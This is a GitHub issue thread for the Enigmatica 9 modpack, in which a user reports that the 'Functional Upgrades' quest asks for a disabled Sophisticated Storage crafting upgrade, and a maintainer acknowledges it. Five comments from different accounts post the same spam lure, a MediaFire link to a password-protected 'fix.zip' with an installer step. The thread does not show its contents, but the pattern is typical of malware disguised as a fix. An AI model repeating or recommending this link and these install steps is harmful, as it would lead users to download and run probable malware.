### ISSUE TITLE
[E9:E] Quest Optionally Asks for Disabled Item

### ISSUE THREAD

**Issue by KienaTesedale** [EnigmaticaModpacks/Enigmatica9#1002]
### Modpack Version

1.22.1

### Describe your issue.

The Storage quest "Functional Upgrades" requests either the Sophisticated Storage Crafting Upgrade or the Sophisticated Storage Stonecutter Upgrade. The Crafting Upgrade is disabled and uncraftable. Note that this quest is about the chest upgrades, not the backpack upgrades.

### Have you modified the modpack?

No

### Did the issue happen in singleplayer or on a server?

Singleplayer

### Discord Username

kiena_tesedale

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MommyHeather** [comment]
The fuck happened to these comments?

Anyway, @NielsPilgaard they need removing haha

**Comment by MuteTiefling** [comment]
Thanks for the report! We'll get that fixed up here.
